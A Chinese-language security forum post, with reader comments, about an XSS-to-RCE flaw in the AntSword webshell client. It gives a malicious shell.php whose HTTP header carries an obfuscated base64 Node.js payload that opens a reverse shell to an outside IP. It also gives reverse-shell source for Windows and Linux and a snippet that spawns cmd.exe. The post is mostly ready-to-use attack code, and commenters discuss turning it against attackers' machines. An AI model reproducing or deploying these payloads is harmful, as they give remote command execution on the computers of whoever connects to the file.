无需下载直接反弹shell-蚁剑XSS/RCE之window/linux环境
今天爆出蚁剑的XSS到RCE,但是公布的是perl的利用方式,分享一个windows下直接反弹的姿势。
使用AntSword要么主机安装有nodejs环境,要么使用官方提供的解析器,所以都是支持nodjs,因此可以基于nodejs直接在windows/linux环境反弹shell. PS:其实能执行CMD,通过powershell,bitsadmin,certutil等下载程序并执行,只是都比较麻烦而已,针对该类型XSS到RCE,直接利用nodejs可能是最简捷的反弹方式了吧!(欢迎有更好利用方式的大佬交流打脸)
1.修改shell.php代码如下(base64解码修改为自己的服务ip和端口,然后重新base64编码即可,切记不要进行url编码)
<?php
header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCg4MDgwLCAiMTIzLjEyMy4xMjMuMTIzIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())'>");
?>
其中windows环境下直接反弹shell对应base64编码的部分源码为:
var net = require("net"), sh = require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(8080, "receiving-IP", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
本人在win10机器上,采用官方提供的windows版加载器,没有其他任何特殊配置,请求后成功执行反弹shell,截图如下
同理可以WINDOWS下直接执行CMD命令或者在Linux下利用nodejs反弹shell。 如果windows环境下执行CMD对应base64编码的部分源码为:
var Process = window.parent.top.process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function (a, b) {};
var env = window.parent.top.process.env;
var env_ = [];
for (var key in env) env_.push(key + '=' + env[key]);
proc.spawn({
file: 'cmd.exe',
args: ['/k calc'],
cwd: null,
windowsVerbatimArguments: false,
detached: false,
envPairs: env_,
stdio: [{
type: 'ignore'
}, {
type: 'ignore'
}, {
type: 'ignore'
}]
});
此外,linux环境下对应base64编码的部分源码为:
var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(8080, "receiving-IP", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
评论34次
这话讲的让作者伤心了 有漏洞不怕改进就好其实更应该感谢作者的无私分享
对于这个洞表示有点懵。。这个漏洞有啥利用场景? 感觉完全是自导自演。。。
比如如果你网站被黑了,发现对方用的是漏洞版本蚁剑连接控制,就可以通过这种反弹攻击者shell可以,取证分析,反制取胜
直接反弹shell厉害了,分分钟反日回去
其实可以黑吃黑
还是大马好额
有没有这种可能?这是作者自己留的后门?
还是用C刀和大马稳妥一点
我自己弹自己?
这个洞确实有点怕怕,一不小心就反被日。
对于这个洞表示有点懵。。这个漏洞有啥利用场景? 感觉完全是自导自演。。。
其实可以黑吃黑
我要这烂菜刀有何用! 等着被反噬不成? 鬼知道还有有多少漏洞是未披露的。 估计谁用谁遭殃
蚁剑相比菜刀来说还是有稍许薄弱了,有些测试时候用到的变种马使用菜刀没问题,使用蚁剑就链接不上了
只用菜刀的表示淡定
要是满足条件,恶意操作 会有漫长的监听过程 利用场景(111,表哥我这有个shell连不上,yi剑的马,没有①剑?我发你)
直接反弹shell厉害了,分分钟反日回去
表示从来只用大马。不用第三方工具。
对于这个洞表示有点懵。。这个漏洞有啥利用场景? 感觉完全是自导自演。。。
比如 如果你网站被黑了,发现对方用的是漏洞版本蚁剑连接控制,就可以通过这种反弹攻击者shell可以,取证分析,反制取胜
对于这个洞表示有点懵。。 这个漏洞有啥利用场景? 感觉完全是自导自演。。。